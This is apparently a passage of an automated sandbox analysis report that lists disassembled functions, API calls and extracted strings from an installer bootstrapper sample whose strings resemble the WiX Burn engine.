Instruction ID: 52e75501631aff80c455188714abc28bd08162cf6e87b02d48561ca4280a5001
Opcode Fuzzy Hash: 54fe9968c06e81204485c56fd25b8da53c64ebf190a36502f904e5956e3448d2
Instruction Fuzzy Hash: AC5129B19243198FDB28CF59D886BAABBF4FB48314F24856AD405EB250E375DE10CF91

Function 008CE9DC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,008CE131), ref: 008CE9E1

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 32149ce451c4bca5fce90ba9b62dd734ee1a58dc73329155b9eee82786dbcd44
Instruction ID: 159604fae4f5c940ae7f8beb4ae1f76495c9b62643e9602ffb7be387b9969a07
Opcode Fuzzy Hash: 32149ce451c4bca5fce90ba9b62dd734ee1a58dc73329155b9eee82786dbcd44
Instruction Fuzzy Hash:

Function 008AFF99 Relevance: 84.5, APIs: 1, Strings: 47, Instructions: 484registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 008B0592

Strings

Failed to create registration key., xrefs: 008B001C
UninstallString, xrefs: 008B0489, 008B049F
Failed to write %ls value., xrefs: 008B0531
EstimatedSize, xrefs: 008B051C, 008B0521, 008B0530
BundleProviderKey, xrefs: 008B015A, 008B015F
HelpLink, xrefs: 008B025A, 008B026D
HelpTelephone, xrefs: 008B0280, 008B0293
%hu.%hu.%hu.%hu, xrefs: 008B00F0
%hs, xrefs: 008B0198
VersionMinor, xrefs: 008B0138, 008B013E
NoRemove, xrefs: 008B0403, 008B0416
BundleAddonCode, xrefs: 008B0075, 008B007D
Failed to write software tags., xrefs: 008B04C5
BundleUpgradeCode, xrefs: 008B0057, 008B005F
"%ls" /modify, xrefs: 008B03B0
ModifyPath, xrefs: 008B03B5, 008B03CB
Publisher, xrefs: 008B0234, 008B0247
VersionMajor, xrefs: 008B010F, 008B0115
BundleVersion, xrefs: 008B00CF, 008B00F5
DisplayIcon, xrefs: 008B01BB, 008B01C5
Comments, xrefs: 008B033A, 008B034D
Failed to register the bundle dependency key., xrefs: 008B0553
%s,0, xrefs: 008B01C0
EngineVersion, xrefs: 008B019D, 008B01A2
DisplayVersion, xrefs: 008B0201, 008B0214
ParentKeyName, xrefs: 008B0312, 008B0325
BundleTag, xrefs: 008B017B, 008B0180
BundleDetectCode, xrefs: 008B0093, 008B009B
ParentDisplayName, xrefs: 008B02F2, 008B0305
"%ls" /uninstall /quiet, xrefs: 008B0448
"%ls" %ls, xrefs: 008B0484
/modify, xrefs: 008B0474
/uninstall, xrefs: 008B047B, 008B0480
3.11.1.2318, xrefs: 008B0193
URLInfoAbout, xrefs: 008B02A6, 008B02B9
QuietUninstallString, xrefs: 008B044D, 008B0463
NoModify, xrefs: 008B038B, 008B039E
NoElevateOnModify, xrefs: 008B03D7, 008B03EA
Failed to update resume mode., xrefs: 008B056D
SystemComponent, xrefs: 008B0428, 008B043B
BundlePatchCode, xrefs: 008B00B1, 008B00B9
Contact, xrefs: 008B0362, 008B0375
Failed to update name and publisher., xrefs: 008B01EE
Failed to write update registration., xrefs: 008B04E5
BundleCachePath, xrefs: 008B003C, 008B0041
URLUpdateInfo, xrefs: 008B02CC, 008B02DF
Failed to cache bundle from path: %ls, xrefs: 008AFFEF

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Close
String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$userVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
API String ID: 3535843008-2755343042
Opcode ID: 72c9b742fe786844ba3bdbe841f7db67ce3d67716f91cad3480d0186e7d324b0
Instruction ID: aafe883b47fdd4aed4304ea8d69a72b27521b9bcbb6753279b14800e925503a7
Opcode Fuzzy Hash: 72c9b742fe786844ba3bdbe841f7db67ce3d67716f91cad3480d0186e7d324b0
Instruction Fuzzy Hash: 2FF1DE31A8066EBBCF2256648D06FBF7665FB04718F040120FA10F67A2DB75ED20EE95

Function 008ACDBD Relevance: 73.9, APIs: 3, Strings: 39, Instructions: 366COMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,008A545D,00000000,008ECA9C,008A5445,00000000), ref: 008ACEF3

Strings

Failed to get @Id., xrefs: 008AD221
Failed to get @DownloadUrl., xrefs: 008AD1EA
Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 008AD1B9
Failed to get @Hash., xrefs: 008AD1E3
Invalid value for @Packaging: %ls, xrefs: 008AD200
Failed to parse @FileSize., xrefs: 008AD1A1
external, xrefs: 008ACF21
CertificateRootPublicKeyIdentifier, xrefs: 008AD03D
Failed to get @SourcePath., xrefs: 008AD1F1
Failed to get @FileSize., xrefs: 008AD1AB
download, xrefs: 008ACEE5
Failed to get next node., xrefs: 008AD228
SourcePath, xrefs: 008ACFB0
Payload, xrefs: 008ACDD8
Container, xrefs: 008ACF4B
Failed to get @Packaging., xrefs: 008AD213
Packaging, xrefs: 008ACEC6
Failed to get @Catalog., xrefs: 008AD1D5
payload.cpp, xrefs: 008ACE3F
LayoutOnly, xrefs: 008ACF8D
Hash, xrefs: 008AD0B7
Failed to hex decode @CertificateRootThumbprint., xrefs: 008AD1C0
Failed to allocate memory for payload structs., xrefs: 008ACE49
Failed to to find container: %ls, xrefs: 008AD186
FilePath, xrefs: 008ACEAB
Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 008AD1B2
FileSize, xrefs: 008AD002
Failed to get @Container., xrefs: 008AD18D
CertificateRootThumbprint, xrefs: 008AD07A
Catalog, xrefs: 008AD0EC
Failed to hex decode the Payload/@Hash., xrefs: 008AD1DC
Failed to get @CertificateRootThumbprint., xrefs: 008AD1C7
Failed to get @FilePath., xrefs: 008AD21A
DownloadUrl, xrefs: 008ACFD9
Failed to get payload node count., xrefs: 008ACE10
embedded, xrefs: 008ACF05
Failed to find catalog., xrefs: 008AD1CE
Failed to select payload nodes., xrefs: 008ACDEB
Failed to get @LayoutOnly., xrefs: 008AD197

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$AllocateCompareProcessString
String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
API String ID: 1171520630-3127305756
Opcode ID: d138f674c0e6133530b0f58af76cc1199608e4dd13881620277783f5a2f97ff6
Instruction ID: 1936bd1c68690a446ec404046b6ca10d9df70bf0b6e84659716d26137ab04b43
Opcode Fuzzy Hash: d138f674c0e6133530b0f58af76cc1199608e4dd13881620277783f5a2f97ff6
Instruction Fuzzy Hash: 3BC1C172D4476AFBEB119A95CC05F6DB664FB07B20F204161FA22FBA91C774EE009790

Function 008A8476 Relevance: 59.8, APIs: 5, Strings: 29, Instructions: 331COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(008A5445,?,00000000,80070490,?,?,?,?,?,?,?,?,008CC1BF,?,008A5445,?), ref: 008A84A7
LeaveCriticalSection.KERNEL32(008A5445,?,?,?,?,?,?,?,?,008CC1BF,?,008A5445,?,008A5445,008A5445,Chain), ref: 008A8804

Strings

Failed to get @Id., xrefs: 008A87EF
Initializing string variable '%ls' to value '%ls', xrefs: 008A861A
variable.cpp, xrefs: 008A87B9
Invalid value for @Type: %ls, xrefs: 008A8778
Failed to get variable node count., xrefs: 008A84E1
Value, xrefs: 008A8565
version, xrefs: 008A862C
Failed to get @Persisted., xrefs: 008A87E1
Failed to set value of variable: %ls, xrefs: 008A87A7
Failed to get next node., xrefs: 008A87F6
Failed to get @Type., xrefs: 008A8788
Persisted, xrefs: 008A854A
Failed to set variant encryption, xrefs: 008A879D
Failed to set variant value., xrefs: 008A878F
Failed to find variable value '%ls'., xrefs: 008A87D2
Failed to insert variable '%ls'., xrefs: 008A86C6
Variable, xrefs: 008A84B1
Failed to get @Value., xrefs: 008A8796
Hidden, xrefs: 008A852F
Failed to change variant type., xrefs: 008A87DA
Type, xrefs: 008A85A3
Failed to select variable nodes., xrefs: 008A84C4
Failed to get @Hidden., xrefs: 008A87E8
Attempt to set built-in variable value: %ls, xrefs: 008A87C8
Initializing hidden variable '%ls', xrefs: 008A8671
Initializing numeric variable '%ls' to value '%ls', xrefs: 008A85E2
Initializing version variable '%ls' to value '%ls', xrefs: 008A8653
numeric, xrefs: 008A85BC
string, xrefs: 008A85F7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
API String ID: 3168844106-1614826165
Opcode ID: 40b379a4c5d2475ca0be46a354f83644a0ad5b04a6c6429f07f6ffc61a17f939
Instruction ID: f530f1ac70a7cecfb258fde373b995e95c12cfff936837665df4077981596fe0
Opcode Fuzzy Hash: 40b379a4c5d2475ca0be46a354f83644a0ad5b04a6c6429f07f6ffc61a17f939
Instruction Fuzzy Hash: D2B1E272D0026AFBDB119B99CC45EAEBB74FF46710F200264F920F6290CB759E41CBA1

Function 008C6CCC Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 379COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,008BBDDC,00000007,?,?,?), ref: 008C6D20

Part of subcall function 008E0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,008A5EB2,00000000), ref: 008E0AE0
Part of subcall function 008E0ACC: GetProcAddress.KERNEL32(00000000), ref: 008E0AE7
Part of subcall function 008E0ACC: GetLastError.KERNEL32(?,?,?,008A5EB2,00000000), ref: 008E0AFE

CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 008C710F
CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 008C7123

Strings

Failed to format MSU uninstall command., xrefs: 008C6E89
SysNative\, xrefs: 008C6D6A
Failed to allocate WUSA.exe path., xrefs: 008C6DB3
D, xrefs: 008C6F3B
"%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 008C6E75
Failed to ensure WU service was enabled to install MSU package., xrefs: 008C6F2E
/log:, xrefs: 008C6EA2
Failed to append log path to MSU command-line., xrefs: 008C6ED4
Failed to wait for executable to complete: %ls, xrefs: 008C709E
Failed to format MSU install command., xrefs: 008C6E5C
Failed to determine WOW64 status., xrefs: 008C6D32
Bootstrapper application aborted during MSU progress., xrefs: 008C7054
Failed to append SysNative directory., xrefs: 008C6D7D
wusa.exe, xrefs: 008C6DA0
"%ls" "%ls" /quiet /norestart, xrefs: 008C6E48
Failed to append log switch to MSU command-line., xrefs: 008C6EB6
2, xrefs: 008C6FB3
WixBundleExecutePackageCacheFolder, xrefs: 008C6E0B, 008C713B
Failed to CreateProcess on path: %ls, xrefs: 008C6F9A
Failed to get action arguments for MSU package., xrefs: 008C6DD6
Failed to find Windows directory., xrefs: 008C6D5F
Failed to get cached path for package: %ls, xrefs: 008C6DFC
msuuser.cpp, xrefs: 008C6F8D, 008C7022, 008C704A
Failed to find System32 directory., xrefs: 008C6D95
Failed to get process exit code., xrefs: 008C702C
Failed to build MSU path., xrefs: 008C6E35

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuuser.cpp$wusa.exe
API String ID: 1400713077-4261965642
Opcode ID: 678139466b7978e4482962aa470e644708cfe7440c538cee168f048e5eecbe0e
Instruction ID: f83299000b6756c637cb436f48f45f14b9e3b5221c475c0aba6601322bcedc80
Opcode Fuzzy Hash: 678139466b7978e4482962aa470e644708cfe7440c538cee168f048e5eecbe0e
Instruction Fuzzy Hash: 17D19E70A4070AAAEB119FA9CC85FAEBBB9FF18704F100039F710E6161E7B5DA509B51

Function 008E744A Relevance: 47.6, APIs: 13, Strings: 14, Instructions: 340COMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 008E755D
SysFreeString.OLEAUT32(00000000), ref: 008E7726
SysFreeString.OLEAUT32(00000000), ref: 008E77C3

Strings

atomutil.cpp, xrefs: 008E7477, 008E77AD
@, xrefs: 008E76CC
subtitle, xrefs: 008E75CC
generator, xrefs: 008E7550
icon, xrefs: 008E7574
entry, xrefs: 008E74D5, 008E769E
updated, xrefs: 008E7604
link, xrefs: 008E74F2, 008E76D4
logo, xrefs: 008E75B0
(, xrefs: 008E7701
title, xrefs: 008E75E8
author, xrefs: 008E749B, 008E762C
category, xrefs: 008E74B8, 008E7665
`Dv, xrefs: 008E7726, 008E77C3

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$FreeHeap$AllocateCompareProcess
String ID: ($@$`Dv$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
API String ID: 1555028553-177796383
Opcode ID: c54140c04a60eae4d8c29f5bf8238b2e4180911bd5eb90a7e4c47dc61e1243f6
Instruction ID: ebacdf89dd29b9016a7b14f6b201c1a544617243974fbebd7d64574875ef83b0
Opcode Fuzzy Hash: c54140c04a60eae4d8c29f5bf8238b2e4180911bd5eb90a7e4c47dc61e1243f6
Instruction Fuzzy Hash: 49B18D7194826ABBDB119BA5CC81FAEBA74FB16724F200355F521EB2D1D770EE10CB90

Function 008E710D Relevance: 47.5, APIs: 11, Strings: 16, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00903E78,000000FF,?,?,?), ref: 008E71D4
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 008E71F9
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008E7219
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 008E7235
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 008E725D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 008E7279
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 008E72B2
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 008E72EB

Part of subcall function 008E6D50: SysFreeString.OLEAUT32(00000000), ref: 008E6E89
Part of subcall function 008E6D50: SysFreeString.OLEAUT32(00000000), ref: 008E6EC8

SysFreeString.OLEAUT32(00000000), ref: 008E736F
SysFreeString.OLEAUT32(00000000), ref: 008E741F

Strings

atomutil.cpp, xrefs: 008E740C
(, xrefs: 008E734A
content, xrefs: 008E72DD
msi.dll, xrefs: 008E7137
updated, xrefs: 008E724F
clbcatq.dll, xrefs: 008E7242
summary, xrefs: 008E71EB
link, xrefs: 008E7172, 008E731D
version.dll, xrefs: 008E7133
cabinet.dll, xrefs: 008E7150
feclient.dll, xrefs: 008E7206
published, xrefs: 008E7227
title, xrefs: 008E720B
author, xrefs: 008E7138, 008E726B
category, xrefs: 008E7155, 008E72A4
`Dv, xrefs: 008E736F, 008E741F

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$Compare$Free
String ID: ($`Dv$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
API String ID: 318886736-3891805788
Opcode ID: e47b21c5e397435bd7345798d00d1bfc582cba2429261063d0bccd6cd8668ce3
Instruction ID: 9340c486bc0b9714fedf7804696f2fc71b97c9c3f8ec39c12f1114dd762d51d1
Opcode Fuzzy Hash: e47b21c5e397435bd7345798d00d1bfc582cba2429261063d0bccd6cd8668ce3
Instruction Fuzzy Hash: 49A1B23190826ABBDB219B95CC41FAEBB64FB06734F204365F921E62D1D730EE10DB91

Function 008CD43E Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 290synchronizationprocessCOMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 008CD4B3
StringFromGUID2.OLE32(?,?,00000027), ref: 008CD4DC
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 008CD5C5
GetLastError.KERNEL32(?,?,?,?), ref: 008CD5CF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 008CD668
WaitForSingleObject.KERNEL32(008EB500,000000FF,?,?,?,?), ref: 008CD673
ReleaseMutex.KERNEL32(008EB500,?,?,?,?), ref: 008CD69D
GetExitCodeProcess.KERNEL32(?,?), ref: 008CD6BE
GetLastError.KERNEL32(?,?,?,?), ref: 008CD6CC
GetLastError.KERNEL32(?,?,?,?), ref: 008CD704

Part of subcall function 008CD33E: WaitForSingleObject.KERNEL32(?,000000FF,762330B0,00000000,?,?,?,?,008CD642,?), ref: 008CD357
Part of subcall function 008CD33E: ReleaseMutex.KERNEL32(?,?,?,?,008CD642,?), ref: 008CD375
Part of subcall function 008CD33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 008CD3B6
Part of subcall function 008CD33E: ReleaseMutex.KERNEL32(?), ref: 008CD3CD
Part of subcall function 008CD33E: SetEvent.KERNEL32(?), ref: 008CD3D6

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 008CD7B9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 008CD7D1

Strings

Failed to convert netfx chainer guid into string., xrefs: 008CD4FB
Failed to allocate section name., xrefs: 008CD51D
Failed to allocate netfx chainer arguments., xrefs: 008CD593
Failed to create netfx chainer guid., xrefs: 008CD4C0
Failed to allocate event name., xrefs: 008CD53F
NetFxEvent.%ls, xrefs: 008CD52B
Failed to CreateProcess on path: %ls, xrefs: 008CD5FE
Failed to create netfx chainer., xrefs: 008CD55E
Failed to process netfx chainer message., xrefs: 008CD648
D, xrefs: 008CD5AA
Failed to wait for netfx chainer process to complete, xrefs: 008CD732
%ls /pipe %ls, xrefs: 008CD57F
NetFxChainer.cpp, xrefs: 008CD4F1, 008CD5F3, 008CD6F0, 008CD728
NetFxSection.%ls, xrefs: 008CD509
Failed to get netfx return code., xrefs: 008CD6FA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
API String ID: 1533322865-1825855094
Opcode ID: 9c230db43aa1f829b97d441d74a6c8183f1ea62d0fafc5f83eebc55134c2e585
Instruction ID: a3d39c57483f3ed3499df87311fff711a61d6f0b187d3a8822bbacca113dc715
Opcode Fuzzy Hash: 9c230db43aa1f829b97d441d74a6c8183f1ea62d0fafc5f83eebc55134c2e585
Instruction Fuzzy Hash: 14A15D72D40329AFDB21ABA8CC85FAEB7B8FB44714F114169EA08EB251D7359D408F91

Function 008B54DC Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 229filepipesleepCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,008EB500,?,00000000,?,008A452F,?,008EB500), ref: 008B54FD
GetCurrentProcessId.KERNEL32(?,008A452F,?,008EB500), ref: 008B5508
SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,008A452F,?,008EB500), ref: 008B553F
ConnectNamedPipe.KERNEL32(?,00000000,?,008A452F,?,008EB500), ref: 008B5554
GetLastError.KERNEL32(?,008A452F,?,008EB500), ref: 008B555E
Sleep.KERNEL32(00000064,?,008A452F,?,008EB500), ref: 008B5593
SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,008A452F,?,008EB500), ref: 008B55B6
WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,008A452F,?,008EB500), ref: 008B55D1
WriteFile.KERNEL32(?,008A452F,008EB500,00000000,00000000,?,008A452F,?,008EB500), ref: 008B55EC
WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,008A452F,?,008EB500), ref: 008B5607
ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,008A452F,?,008EB500), ref: 008B5622
GetLastError.KERNEL32(?,008A452F,?,008EB500), ref: 008B567D
GetLastError.KERNEL32(?,008A452F,?,008EB500), ref: 008B56B1
GetLastError.KERNEL32(?,008A452F,?,008EB500), ref: 008B56E5
GetLastError.KERNEL32(?,008A452F,?,008EB500), ref: 008B5719
GetLastError.KERNEL32(?,008A452F,?,008EB500), ref: 008B574A
GetLastError.KERNEL32(?,008A452F,?,008EB500), ref: 008B577B

Strings

Failed to reset pipe to blocking., xrefs: 008B5774
Failed to write secret to pipe., xrefs: 008B570F
Failed to wait for child to connect to pipe., xrefs: 008B5673
Failed to set pipe to non-blocking., xrefs: 008B57A5
Failed to write our process id to pipe., xrefs: 008B56DB
Failed to read ACK from pipe., xrefs: 008B56A7
Failed to write secret length to pipe., xrefs: 008B5743
pipe.cpp, xrefs: 008B5669, 008B569D, 008B56D1, 008B5705, 008B5739, 008B576A, 008B579B
crypt32.dll, xrefs: 008B55CF

Memory Dump Source

